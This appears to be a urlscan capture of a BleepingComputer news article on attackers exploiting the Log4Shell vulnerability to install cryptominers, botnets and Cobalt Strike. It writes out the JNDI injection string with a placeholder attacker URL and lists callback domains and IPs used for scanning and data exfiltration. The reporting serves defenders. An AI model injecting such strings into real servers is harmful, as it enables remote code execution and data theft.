www.bleepingcomputer.com
Open in
urlscan Pro
104.20.60.209
Public Scan
URL:
https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/
Submission: On April 27 via api from US — Scanned from DE
Submission: On April 27 via api from US — Scanned from DE
Form analysis 6 forms found in the DOM
https://www.bleepingcomputer.com/search/
<form title="Search site" action="https://www.bleepingcomputer.com/search/">
<input type="hidden" name="cx" value="partner-pub-0920899300397823:3529943228">
<input type="hidden" name="cof" value="FORID:10">
<input type="hidden" name="ie" value="UTF-8">
<input type="search" name="q" aria-label="Search Site" placeholder="Search Site">
</form>https://www.bleepingcomputer.com/search/
<form action="https://www.bleepingcomputer.com/search/">
<input type="hidden" name="cx" value="partner-pub-0920899300397823:3529943228">
<input type="hidden" name="cof" value="FORID:10">
<input type="hidden" name="ie" value="UTF-8">
<input type="search" name="q" aria-label="Search Site" placeholder="Search Site">
</form>POST //bleepingcomputer.us10.list-manage.com/subscribe/post?u=3e2b3b692f780cdff40d45346&id=30c98e654e
<form action="//bleepingcomputer.us10.list-manage.com/subscribe/post?u=3e2b3b692f780cdff40d45346&id=30c98e654e" method="post" target="_blank" novalidate="">
<input type="email" name="EMAIL" aria-label="Enter email address" placeholder="Email Address...">
<div style="position: absolute; left: -5000px;"><input type="hidden" aria-hidden="true" name="b_3e2b3b692f780cdff40d45346_30c98e654e" tabindex="-1" value=""></div>
<input type="submit" value="Submit" class="bc_sub_btn">
</form>POST //bleepingcomputer.us10.list-manage.com/subscribe/post?u=3e2b3b692f780cdff40d45346&id=30c98e654e
<form action="//bleepingcomputer.us10.list-manage.com/subscribe/post?u=3e2b3b692f780cdff40d45346&id=30c98e654e" method="post" target="_blank" novalidate="">
<input type="email" aria-label="Enter email address" name="EMAIL" placeholder="Email Address...">
<div style="position: absolute; left: -5000px;"><input type="hidden" aria-hidden="true" name="b_3e2b3b692f780cdff40d45346_30c98e654e" tabindex="-1" value=""></div>
<input type="submit" value="Submit" class="bc_sub_btn">
</form>POST https://www.bleepingcomputer.com/forums/index.php?app=core&module=global§ion=login&do=process&return=https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/
<form action="https://www.bleepingcomputer.com/forums/index.php?app=core&module=global&section=login&do=process&return=https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/"
method="post">
<div class="bc_form_feild">
<label for="ips_username">Username</label>
<input aria-label="Enter login name" title="Enter login name" type="text" id="ips_username" name="ips_username" autocomplete="username">
</div>
<div class="bc_form_feild">
<label for="ips_password">Password</label>
<input aria-label="Enter login password" title="Enter login passwod" type="password" id="ips_password" name="ips_password" autocomplete="current-password">
</div>
<div class="bc_form_feild">
<div class="bc_remember">
<input id="remember" type="checkbox" name="rememberMe" value="1" checked="checked">
<label for="remember">Remember Me</label>
</div>
<div class="bc_anon">
<input id="anonymous" type="checkbox" name="anonymous" value="1">
<label for="anonymous">Sign in anonymously</label>
</div>
</div>
<div class="bc_btn_wrap">
<input type="hidden" name="auth_key" value="880ea6a14ea49e853634fbdc5015a024">
<input type="submit" aria-label="Login to site" title="Login" value="Login" class="bc_sub_btn">
<a aria-label="Sign in with Twitter" href="https://www.bleepingcomputer.com/forums/index.php?app=core&module=global&section=login&serviceClick=twitter&return=https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/" class="bc_twitter_btn"><img src="https://www.bleepstatic.com/images/site/login/twitter.png" width="28" height="24" alt="Sign in with Twitter button"> Sign in with Twitter</a>
<hr>
<p>Not a member yet? <a aria-label="Register account" title="Register account" href="https://www.bleepingcomputer.com/forums/index.php?app=core&module=global&section=register">Register Now</a></p>
</div>
</form><form>
<input type="hidden" id="comment-id-report" value="0">
<ul>
<li>
<label><input type="radio" name="comment-report-reason" value="Spam">Spam</label>
</li>
<li>
<label><input type="radio" name="comment-report-reason" value="Abusive or Harmful">Abusive or Harmful</label>
</li>
<li>
<label><input type="radio" name="comment-report-reason" value="Inappropriate content">Inappropriate content</label>
</li>
<li>
<label><input type="radio" name="comment-report-reason" value="Strong language">Strong language</label>
</li>
<li>
<label><input type="radio" name="comment-report-reason" value="Other">Other</label>
</li>
<li id="comment-report-other-reason-wrap" style="display:none;">
<textarea aria-label="Enter other reason for reporting the comment" rows="2" cols="2" id="comment-report-other-reason"></textarea>
</li>
</ul>
<p>Read our <a href="https://www.bleepingcomputer.com/posting-guidelines/">posting guidelinese</a> to learn what content is prohibited.</p>
</form>Text Content
WE VALUE YOUR PRIVACY
We and our partners store and/or access information on a device, such as cookies
and process personal data, such as unique identifiers and standard information
sent by a device for personalised ads and content, ad and content measurement,
and audience insights, as well as to develop and improve products.
With your permission we and our partners may use precise geolocation data and
identification through device scanning. You may click to consent to our and our
partners’ processing as described above. Alternatively you may access more
detailed information and change your preferences before consenting or to refuse
consenting. Please note that some processing of your personal data may not
require your consent, but you have a right to object to such processing. Your
preferences will apply to this website only. You can change your preferences at
any time by returning to this site or visit our privacy policy.
MORE OPTIONSAGREE
*
*
*
*
*
*
* News
* Featured
* Latest
* Coca-Cola investigates hackers' claims of breach and data theft
* American Dental Association hit by new Black Basta ransomware
* Emotet malware now installs via PowerShell in Windows shortcut files
* Public interest in Log4Shell fades but attack surface remains
* Microsoft says Russia hit Ukraine with hundreds of cyberattacks
* Russian govt impersonators target telcos in phishing attacks
* Cybersecurity agencies reveal top exploited vulnerabilities of 2021
* RIG Exploit Kit drops RedLine malware via Internet Explorer bug
* Downloads
* Latest
* Most Downloaded
* Qualys BrowserCheck
* STOPDecrypter
* AuroraDecrypter
* FilesLockerDecrypter
* AdwCleaner
* ComboFix
* RKill
* Junkware Removal Tool
* Virus Removal Guides
* Latest
* Most Viewed
* Ransomware
* How to remove the PBlock+ adware browser extension
* Remove the Toksearches.xyz Search Redirect
* Remove the Smashapps.net Search Redirect
* Remove the Smashappsearch.com Search Redirect
* Remove Security Tool and SecurityTool (Uninstall Guide)
* How to remove Antivirus 2009 (Uninstall Instructions)
* How to Remove WinFixer / Virtumonde / Msevents / Trojan.vundo
* How to remove Google Redirects or the TDSS, TDL3, or Alureon rootkit using
TDSSKiller
* Locky Ransomware Information, Help Guide, and FAQ
* CryptoLocker Ransomware Information Guide and FAQ
* CryptorBit and HowDecrypt Information Guide and FAQ
* CryptoDefense and How_Decrypt Ransomware Information Guide and FAQ
* Tutorials
* Latest
* Popular
* How to make the Start menu full screen in Windows 10
* How to install the Microsoft Visual C++ 2015 Runtime
* How to open an elevated PowerShell Admin prompt in Windows 10
* How to Translate a Web Page in Google Chrome
* How to start Windows in Safe Mode
* How to remove a Trojan, Virus, Worm, or other Malware
* How to show hidden files in Windows 7
* How to see hidden files in Windows
* Deals
* Categories
* eLearning
* IT Certification Courses
* Gear + Gadgets
* Security
* Forums
* More
* Startup Database
* Uninstall Database
* File Database
* Glossary
* Chat on Discord
* Send us a Tip!
* Welcome Guide
* Home
* News
* Security
* Hackers start pushing malware in worldwide Log4Shell attacks
* AddThis Sharing Buttons
Share to FacebookFacebookShare to TwitterTwitterShare to
LinkedInLinkedInShare to RedditReddit113Share to Hacker NewsHacker NewsShare
to EmailEmail
*
HACKERS START PUSHING MALWARE IN WORLDWIDE LOG4SHELL ATTACKS
By
LAWRENCE ABRAMS
* December 12, 2021
* 06:07 PM
* 0
Source: Kevin Beaumont
Threat actors and researchers are scanning for and exploiting the Log4j
Log4Shell vulnerability to deploy malware or find vulnerable servers. In this
article, we have compiled the known payloads, scans, and attacks using the Log4j
vulnerability.
Early Friday morning, an exploit was publicly released for a critical zero-day
vulnerability dubbed 'Log4Shell' in the Apache Log4j Java-based logging platform
used to access web server and application logs.
To exploit this vulnerability, a threat actor can change their web browser's
user agent and visit a site or search for a string on a website using the format
${jndi:ldap://[attacker_URL]}. Doing so will cause the string to be appended to
the web server's access logs.
When the Log4j application parses these logs and encounters the string, the bug
will force the server to make a callback, or request, to the URL listed in the
JNDI string. Threat actors can then use that URL to pass Base64-encoded commands
or Java classes to execute on the vulnerable device.
PLAY Top Articles Video Settings Full Screen About Connatix V160042 Read More
Read More Read More Read More Read More Read More Russian govt impersonators
target telcos inphishing attacks 1/1 Skip Ad Continue watching after the ad
Visit Advertiser websiteGO TO PAGE
Furthermore, just forcing the connection to the remote server is used to
determine if a server is vulnerable to the Log4shell vulnerability.
While Apache quickly released Log4j 2.15.0 to resolve the vulnerability, threat
actors had already started to scan for and exploit vulnerable servers to
exfiltrate data, install malware, or take over the server.
As this software is used in thousands of enterprise applications and websites,
there is significant concern that it will lead to widespread attacks and malware
deployment.
Below we outline the known attacks currently exploiting the Log4j vulnerability.
LOG4SHELL USED TO INSTALL MALWARE
When an easily exploitable remote code execution vulnerability is disclosed,
malware distributors are usually the first to begin utilizing it.
Below we have compiled the known malware payloads exploiting Log4j from
BleepingComputer web server access logs, GreyNoise data, and reports from
researchers.
CRYPTOMINERS
As soon as the vulnerability was released, we saw threat actors exploiting the
Log4Shell vulnerability to execute shell scripts that download and install
various cryptominers, as shown below.
The threat actors behind the Kinsing backdoor and cryptomining botnet are
heavily abusing the Log4j vulnerability with Base64 encoded payloads that have
the vulnerable server download and execute shell scripts.
Kinsing Log4Shell exploit and decoded commands
Source: BleepingComputer
This shell script will remove competing malware from the vulnerable device and
then download and install the Kinsing malware, which will begin mining for
cryptocurrency.
Kinsing installer script
Source: BleepingComputer
Other Log4Shell exploits seen by BleepingComputer to be installing miners can be
seen in the image below.
Other malicious cryptominer installers
MIRAI AND MUHSTIK BOTNETS
Netlab 360 reports that the threat actors exploit the vulnerability to install
the Mirai and Muhstik malware on vulnerable devices.
These malware families recruit IoT devices and servers into their botnets and
use them to deploy cryptominers and perform large-scale DDoS attacks.
"This morning we got the first answers, our Anglerfish and Apacket honeypots
have caught 2 waves of attacks using the Log4j vulnerability to form botnets,
and a quick sample analysis showed that they were used to form Muhstik and Mirai
botnets respectively, both targeting Linux devices," explains Netlab 360
researchers.
COBALT STRIKE BEACONS
The Microsoft Threat Intelligence Center reported that the Log4j vulnerabilities
are also being exploited to drop Cobalt Strike beacons.
Cobalt Strike is a legitimate penetration testing toolkit where red teamers
deploy agents, or beacons, on "compromised" devices to perform remote network
surveillance or execute further commands.
However, threat actors commonly use cracked versions of Cobalt Strike as part of
network breaches and during ransomware attacks.
SCANNING AND INFORMATION DISCLOSURE
In addition to using the Log4Shell exploits to install malware, threat actors
and security researchers are using the exploit to scan for vulnerable servers
and exfiltrate information from them.
As you can see below, researchers use the exploit to force vulnerable servers to
access URLs or perform DNS requests for callback domains. This allows the
researchers or threat actors to determine if the server is vulnerable and use it
for future attacks, research, or attempts to claim a bug bounty award.
Some researchers may be going a step too far by using the exploit to exfiltrate
environment variables that contain server data without permission, including the
host's name, the user name the Log4j service is running under, the operating
system name, and OS version number.
Researchers and threat actors scanning for vulnerable servers
Source: BleepingComputer
The most common domains or IP addresses used as part of the scanning are/or data
exfiltration campaigns are:
interactsh.com
burpcollaborator.net
dnslog.cn
bin${upper:a}ryedge.io
leakix.net
bingsearchlib.com
205.185.115.217:47324
bingsearchlib.com:39356
canarytokens.com
Of particular interest is the bingsearchlib.com domain, which is being used
heavily as a callback for Log4j exploits. However, a security researcher told
BleepingComputer that while the domain was being used as an exploit callback,
bingsearchlib.com was not registered.
The security researcher said they registered the domain to prevent threat actors
from abusing it but are not logging requests.
Threat intelligence company GreyNoise shows that IP addresses using the
bingsearchlib.com callback also commonly use a Log4Shell callback of
205.185.115.217:47324.
Another domain we have seen heavily used in Log4j vulnerability scans is the
'psc4fuel.com' domain. After publishing this article, a cybersecurity company
contacted us to state it was there
For unknown attacks, BleepingComputer has seen repeated requests from a domain
named psc4fuel.com attempting to exploit our website. This domain appears
appears very similar to the legitimate psc4fuel.com domain belonging to a
petroleum services company.psc4fuel.com domain.
psc4fuel.com domain used in Log4j attacks
Source: BleepingComputer
After publishing this story, BleepingComputer was contacted by a cybersecurity
company who states that the domain belongs to them, that no Java classes are
being pushed by the URLs, and they do not accept connections at the URL.
As for the similarities of the domain, they told us that the domain is not
intentionally impersonating the petroleum company.
While there has been no public research showing that ransomware gangs or other
threat actors utilize the Log4j exploit, the fact that Cobalt Strike beacons
have been deployed means these attacks are imminent.
Due to this, it is imperative that all users install the latest version of Log4j
or affected applications to resolve this vulnerability as soon as possible.
If you know of other malware campaigns exploiting the Log4j vulnerability,
please let us know via Signal at 646-961-3731, Twitter, or our contact form so
we can add the information to this article.
Update 12/12/21 9:50 PM EST: Added Cobalt Strike beacons detected by Microsoft.
Update 12/14/21 11:00 AM EST: Updated story with more information about the
pscfuel.com domain.
RELATED ARTICLES:
Public interest in Log4Shell fades but attack surface remains
Log4shell exploits now used mostly for DDoS botnets, cryptominers
Mirai malware now delivered using Spring4Shell exploits
Beastmode botnet boosts DDoS power with new router exploits
Public Redis exploit used by malware gang to grow botnet
* Apache Log4j
* CryptoMiner
* Exploit
* Log4j
* Log4Shell
* Malware
* Mirai
* Vulnerability
* Facebook
* Twitter
* LinkedIn
* Email
*
LAWRENCE ABRAMS
Lawrence Abrams is the owner and Editor in Chief of BleepingComputer.com.
Lawrence's area of expertise includes Windows, malware removal, and computer
forensics. Lawrence Abrams is a co-author of the Winternals Defragmentation,
Recovery, and Administration Field Guide and the technical editor for Rootkits
for Dummies.
* Previous Article
* Next Article
POST A COMMENT COMMUNITY RULES
YOU NEED TO LOGIN IN ORDER TO POST A COMMENT
Not a member yet? Register Now
YOU MAY ALSO LIKE:
Popular Stories
* Quantum ransomware seen deployed in rapid network attacks
* Windows 10 KB5011831 update released with 26 bug fixes, improvements
NEWSLETTER SIGN UP
To receive periodic updates and news from BleepingComputer, please use the form
below.
NEWSLETTER SIGN UP
* Follow us:
*
*
*
*
MAIN SECTIONS
* News
* Downloads
* Virus Removal Guides
* Tutorials
* Startup Database
* Uninstall Database
* File Database
* Glossary
COMMUNITY
* Forums
* Forum Rules
* Chat
USEFUL RESOURCES
* Welcome Guide
* Sitemap
COMPANY
* About BleepingComputer
* Contact Us
* Send us a Tip!
* Advertising
* Write for BleepingComputer
* Social & Feeds
* Changelog
Terms of Use - Privacy Policy - Ethics Statement
Copyright @ 2003 - 2022 Bleeping Computer® LLC - All Rights Reserved
LOGIN
Username
Password
Remember Me
Sign in anonymously
Sign in with Twitter
--------------------------------------------------------------------------------
Not a member yet? Register Now
REPORTER
HELP US UNDERSTAND THE PROBLEM. WHAT IS GOING ON WITH THIS COMMENT?
* Spam
* Abusive or Harmful
* Inappropriate content
* Strong language
* Other
*
Read our posting guidelinese to learn what content is prohibited.
Submitting...
SUBMIT